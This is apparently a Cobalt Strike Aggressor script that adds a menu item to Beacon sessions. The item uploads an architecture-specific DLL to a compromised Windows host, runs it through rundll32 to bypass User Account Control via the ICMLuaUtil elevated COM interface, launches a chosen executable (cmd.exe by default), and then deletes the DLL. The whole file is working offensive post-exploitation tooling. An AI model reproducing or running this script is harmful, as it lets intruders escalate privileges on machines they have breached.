sub combypassuac_{
	if (-is64 $3['bid']){
		blog($3['bid'], "The Beacon Arch:x64");
		$dllpath = script_resource("dll/x64/combypass.dll");
	}else{
		blog($3['bid'], "The Beacon Arch:x86");
		$dllpath = script_resource("dll/x86/combypass.dll");
	}

	btask($3['bid'], "Type: Elevated COM interface");
	btask($3['bid'], "Method: ICMLuaUtil");
	bupload($3['bid'], $dllpath);
	bshell($3['bid'], "rundll32 combypass.dll,MyBypassUAC $3['executepath']");
	brm($3['bid'], "combypass.dll");
}

sub combypassuac{
	foreach $id ($bid){
		$dialog = dialog("COM DLL Bypassuc", %(executepath => "C:\\Windows\\System32\\cmd.exe", bid => $id), &combypassuac_);
		dialog_description($dialog, "combypassuac #指定一个要运行的PE文件");
		drow_text($dialog, "executepath", "executepath:");
		dbutton_action($dialog, "run");
		dialog_show($dialog);
	}
}


popup beacon_bottom{
	menu "&bypassuac"{
		item "&Elevated COM Bypassuc"{
			$bid = $1;
			combypassuac($bid);
		}
	}

}
